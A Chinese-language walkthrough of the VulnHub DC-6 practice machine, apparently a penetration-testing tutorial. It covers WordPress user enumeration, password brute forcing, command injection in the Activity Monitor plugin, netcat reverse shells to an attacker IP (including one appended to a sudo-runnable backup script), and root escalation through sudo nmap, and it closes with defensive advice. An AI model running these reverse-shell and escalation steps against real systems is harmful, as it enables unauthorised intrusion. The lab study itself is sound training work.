VulnHub靶机 DC-6 打靶实战 渗透详细过程
字数 1474 2025-08-19 12:42:26

VulnHub靶机DC-6渗透测试详细教学文档

一、靶机概述

DC-6是VulnHub上提供的一个专为渗透测试练习设计的靶机,基于WordPress CMS构建,包含多种漏洞和提权路径。

二、环境准备

  1. 靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/
  2. 将靶机导入虚拟机软件(如VMware或VirtualBox)
  3. 确保攻击机(Kali Linux)与靶机在同一网络环境中

三、渗透测试流程

1. 主机发现

使用以下命令识别靶机IP地址:

arp-scan -l
# 或
nmap -sn 192.168.0.0/24

2. 端口扫描与服务识别

nmap -p- 192.168.0.106
nmap -p80 -sV -A 192.168.0.106

扫描结果应显示开放22(SSH)和80(HTTP)端口。

3. Web应用信息收集

whatweb http://192.168.0.106

发现使用WordPress CMS,需要配置本地hosts解析:

echo "192.168.0.106 wordy" >> /etc/hosts

4. WordPress枚举

使用WPScan枚举用户:

wpscan --url http://wordy -e u

成功枚举出五位用户信息,保存到user.txt文件中。

5. 目录爆破

dirsearch -u http://wordy -i 200

发现登录界面/wp-login.php。

6. 密码爆破

根据作者提示,从rockyou.txt中筛选包含"k01"的密码:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy -U user.txt -P passwords.txt

成功爆破出凭据:

  • 用户名:mark
  • 密码:helpdesk01

7. 获取初始访问

  1. 使用获取的凭据登录WordPress后台
  2. 发现"Activity monitor"插件存在命令注入漏洞
  3. 测试命令注入: 
    127.0.0.1 | ls
  4. 建立反向shell:
    • Kali监听: 
      nc -lvvp 8888
    • 靶机执行(通过修改请求数据包绕过长度限制): 
      127.0.0.1 | nc -e /bin/bash 192.168.0.107 8888

8. 权限提升路径

8.1 信息收集

  1. 获取稳定shell: 
    python -c "import pty;pty.spawn('/bin/bash')"
  2. 检查用户目录:
    • /home/jens/backups.sh - 网站备份脚本
    • /home/mark/stuff/things-to-do.txt - 包含graham用户的密码

8.2 横向移动

使用graham凭据通过SSH登录:

ssh graham@192.168.0.106

8.3 提权至jens用户

  1. 检查sudo权限: 
    sudo -l
  2. 发现可以jens用户身份执行/home/jens/backups.sh
  3. 修改脚本添加反向shell: 
    echo "nc -e /bin/bash 192.168.0.107 6666" >> backups.sh
sudo -u jens /home/jens/backups.sh
  4. Kali监听6666端口获取jens shell

8.4 提权至root

  1. 再次检查sudo权限: 
    sudo -l
  2. 发现jens可以root权限执行nmap
  3. 创建提权脚本: 
    echo 'os.execute("/bin/sh")' > root_shell.sh
sudo nmap --script=root_shell.sh
  4. 成功获取root权限

四、关键知识点总结

  1. 主机发现:使用arp-scan或nmap进行网络扫描
  2. 服务枚举:nmap的-sV和-A参数获取详细服务信息
  3. WordPress枚举:WPScan工具的用户枚举功能
  4. 密码爆破:合理利用字典和过滤技术提高效率
  5. 命令注入:识别和利用Web应用中的命令注入漏洞
  6. 反向shell:多种建立反向shell的方法
  7. 权限提升路径
    • 通过信息泄露获取新凭据
    • 利用sudo权限执行特定脚本
    • 滥用具有SUID权限或特殊sudo权限的应用程序(如nmap)

五、防御建议

  1. WordPress安全:

    • 限制用户枚举功能
    • 使用强密码策略
    • 及时更新插件和核心

  2. 系统安全:

    • 限制sudo权限
    • 避免使用危险程序的特殊权限
    • 定期检查SUID/SGID文件

  3. 开发安全:

    • 避免命令注入漏洞
    • 对用户输入进行严格过滤
    • 最小权限原则

六、工具清单

  1. arp-scan - 主机发现
  2. nmap - 端口扫描和服务识别
  3. whatweb - Web应用指纹识别
  4. wpscan - WordPress漏洞扫描
  5. dirsearch - 目录爆破
  6. netcat - 建立反向shell
  7. sudo/nmap - 提权工具

通过本实验,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别是WordPress系统的安全评估和Linux系统的提权技术。

VulnHub靶机DC-6渗透测试详细教学文档 一、靶机概述 DC-6是VulnHub上提供的一个专为渗透测试练习设计的靶机,基于WordPress CMS构建,包含多种漏洞和提权路径。 二、环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/ 将靶机导入虚拟机软件(如VMware或VirtualBox) 确保攻击机(Kali Linux)与靶机在同一网络环境中 三、渗透测试流程 1. 主机发现 使用以下命令识别靶机IP地址: 2. 端口扫描与服务识别 扫描结果应显示开放22(SSH)和80(HTTP)端口。 3. Web应用信息收集 发现使用WordPress CMS,需要配置本地hosts解析: 4. WordPress枚举 使用WPScan枚举用户: 成功枚举出五位用户信息,保存到user.txt文件中。 5. 目录爆破 发现登录界面/wp-login.php。 6. 密码爆破 根据作者提示,从rockyou.txt中筛选包含"k01"的密码: 成功爆破出凭据: 用户名:mark 密码:helpdesk01 7. 获取初始访问 使用获取的凭据登录WordPress后台 发现"Activity monitor"插件存在命令注入漏洞 测试命令注入: 建立反向shell: Kali监听: 靶机执行(通过修改请求数据包绕过长度限制): 8. 权限提升路径 8.1 信息收集 获取稳定shell: 检查用户目录: /home/jens/backups.sh - 网站备份脚本 /home/mark/stuff/things-to-do.txt - 包含graham用户的密码 8.2 横向移动 使用graham凭据通过SSH登录: 8.3 提权至jens用户 检查sudo权限: 发现可以jens用户身份执行/home/jens/backups.sh 修改脚本添加反向shell: Kali监听6666端口获取jens shell 8.4 提权至root 再次检查sudo权限: 发现jens可以root权限执行nmap 创建提权脚本: 成功获取root权限 四、关键知识点总结 主机发现 :使用arp-scan或nmap进行网络扫描 服务枚举 :nmap的-sV和-A参数获取详细服务信息 WordPress枚举 :WPScan工具的用户枚举功能 密码爆破 :合理利用字典和过滤技术提高效率 命令注入 :识别和利用Web应用中的命令注入漏洞 反向shell :多种建立反向shell的方法 权限提升路径 : 通过信息泄露获取新凭据 利用sudo权限执行特定脚本 滥用具有SUID权限或特殊sudo权限的应用程序(如nmap) 五、防御建议 WordPress安全: 限制用户枚举功能 使用强密码策略 及时更新插件和核心 系统安全: 限制sudo权限 避免使用危险程序的特殊权限 定期检查SUID/SGID文件 开发安全: 避免命令注入漏洞 对用户输入进行严格过滤 最小权限原则 六、工具清单 arp-scan - 主机发现 nmap - 端口扫描和服务识别 whatweb - Web应用指纹识别 wpscan - WordPress漏洞扫描 dirsearch - 目录爆破 netcat - 建立反向shell sudo/nmap - 提权工具 通过本实验,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别是WordPress系统的安全评估和Linux系统的提权技术。